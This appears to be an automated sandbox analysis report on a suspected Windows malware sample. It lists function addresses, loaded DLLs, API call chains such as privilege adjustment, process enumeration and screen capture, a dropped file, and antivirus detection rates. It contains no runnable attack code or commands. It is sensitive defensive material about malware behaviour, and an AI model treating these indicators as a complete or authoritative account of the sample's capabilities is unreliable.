Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400150200_2_0000000140015020
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400650300_2_0000000140065030
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B30B00_2_00000001400B30B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400110F00_2_00000001400110F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009710B0_2_000000014009710B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400971190_2_0000000140097119
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400971240_2_0000000140097124
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014006D1400_2_000000014006D140
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007B1500_2_000000014007B150
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400631600_2_0000000140063160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003F1A00_2_000000014003F1A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400751C00_2_00000001400751C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400971E00_2_00000001400971E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400971F90_2_00000001400971F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400972010_2_0000000140097201
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400972170_2_0000000140097217
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005B2700_2_000000014005B270
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400612800_2_0000000140061280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400032860_2_0000000140003286
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400172D00_2_00000001400172D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000D3100_2_000000014000D310
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005D3900_2_000000014005D390
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400993B00_2_00000001400993B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400393C90_2_00000001400393C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400573E00_2_00000001400573E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009D4000_2_000000014009D400
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007F4200_2_000000014007F420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005F4300_2_000000014005F430
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400594700_2_0000000140059470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009949B0_2_000000014009949B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400254A00_2_00000001400254A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007B4C00_2_000000014007B4C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004B4F00_2_000000014004B4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004F4F00_2_000000014004F4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400855B00_2_00000001400855B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400715D00_2_00000001400715D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400635D00_2_00000001400635D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400516700_2_0000000140051670
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400156F00_2_00000001400156F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005F7000_2_000000014005F700
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003F7100_2_000000014003F710
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400437400_2_0000000140043740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400197700_2_0000000140019770
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005B7B00_2_000000014005B7B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400997DC0_2_00000001400997DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400337DF0_2_00000001400337DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400658600_2_0000000140065860
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400898700_2_0000000140089870
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400358E60_2_00000001400358E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400A99000_2_00000001400A9900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D19400_2_00000001400D1940
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001B9800_2_000000014001B980
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D99900_2_00000001400D9990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400539900_2_0000000140053990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400179A00_2_00000001400179A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400719B00_2_00000001400719B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400059F00_2_00000001400059F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004DA200_2_000000014004DA20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007DA280_2_000000014007DA28
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140069A600_2_0000000140069A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014006FA700_2_000000014006FA70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140039AA00_2_0000000140039AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003FAB00_2_000000014003FAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008FAE00_2_000000014008FAE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140073BA00_2_0000000140073BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140031BA90_2_0000000140031BA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008DBF30_2_000000014008DBF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005DC200_2_000000014005DC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140099C210_2_0000000140099C21
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004BC800_2_000000014004BC80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014002BC900_2_000000014002BC90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097CA00_2_0000000140097CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400CFCAC0_2_00000001400CFCAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140057CB00_2_0000000140057CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001FD190_2_000000014001FD19
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007BD2E0_2_000000014007BD2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140047D400_2_0000000140047D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000DDC00_2_000000014000DDC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003DE000_2_000000014003DE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140063E500_2_0000000140063E50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140013E600_2_0000000140013E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400A3ED00_2_00000001400A3ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140051EE00_2_0000000140051EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140093EF00_2_0000000140093EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005FF020_2_000000014005FF02
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400DDF1C0_2_00000001400DDF1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140099F2D0_2_0000000140099F2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004FF2B0_2_000000014004FF2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140085F400_2_0000000140085F40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008FF500_2_000000014008FF50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400BBF6B0_2_00000001400BBF6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014006DF800_2_000000014006DF80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014006BF900_2_000000014006BF90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004DFA00_2_000000014004DFA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000FFD00_2_000000014000FFD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: String function: 00000001400CA91C appears 395 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: String function: 00000001400403F0 appears 63 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: String function: 0000000140040740 appears 463 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: String function: 00000001400CB614 appears 38 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: String function: 00000001400CAB74 appears 60 times
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000000.2064725844.000000014012A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ntvdm64.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ntvdm64.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeSection loaded: coremessaging.dllJump to behavior
Source: classification engineClassification label: mal56.evad.winEXE@3/5@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140041B60 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,0_2_0000000140041B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0000000140081CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140060CB9 wcsncpy,GetDiskFreeSpaceW,GetLastError,free,malloc,0_2_0000000140060CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081F60 CreateToolhelp32Snapshot,Process32FirstW,_wcstoi64,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,0_2_0000000140081F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400620E0 _wcstoi64,CoCreateInstance,powf,powf,powf,log10,free,malloc,free,malloc,0_2_00000001400620E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400207E0 FindResourceW,SizeofResource,LoadResource,LockResource,0_2_00000001400207E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\1img.pngJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeReversingLabs: Detection: 13%
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeVirustotal: Detection: 45%
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeStatic file information: File size 1277440 > 1048576
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B4300 LoadLibraryW,GetProcAddress,0_2_00000001400B4300
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeStatic PE information: section name: text
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014012A4CB push rbp; iretd 0_2_000000014012A4DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009D078 push rsi; retf 0009h0_2_000000014009D079
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D912C push rbp; iretd 0_2_00000001400D9624
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B2650 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,0_2_00000001400B2650
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009E220 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,0_2_000000014009E220
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B2480 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,0_2_00000001400B2480
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140050882 IsZoomed,IsIconic,0_2_0000000140050882
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AE920 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,0_2_00000001400AE920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007A9C0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,free,malloc,free,malloc,0_2_000000014007A9C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400A29F0 CheckMenuItem,CheckMenuItem,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetForegroundWindow,GetWindowThreadProcessId,SetForegroundWindow,SetForegroundWindow,TrackPopupMenuEx,PostMessageW,GetForegroundWindow,SetForegroundWindow,0_2_00000001400A29F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140058D60 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,free,malloc,0_2_0000000140058D60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140044E60 IsWindow,DestroyWindow,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,MonitorFromPoint,GetMonitorInfoW,IsWindow,CreateWindowExW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,0_2_0000000140044E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140054F10 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,malloc,0_2_0000000140054F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400570B0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,0_2_00000001400570B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140069800 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,0_2_0000000140069800
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140053990 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,SelectObject,DeleteDC,DeleteObject,free,free,malloc,GetPixel,ReleaseDC,free,malloc,free,malloc,0_2_0000000140053990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140097CA0 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,0_2_0000000140097CA0
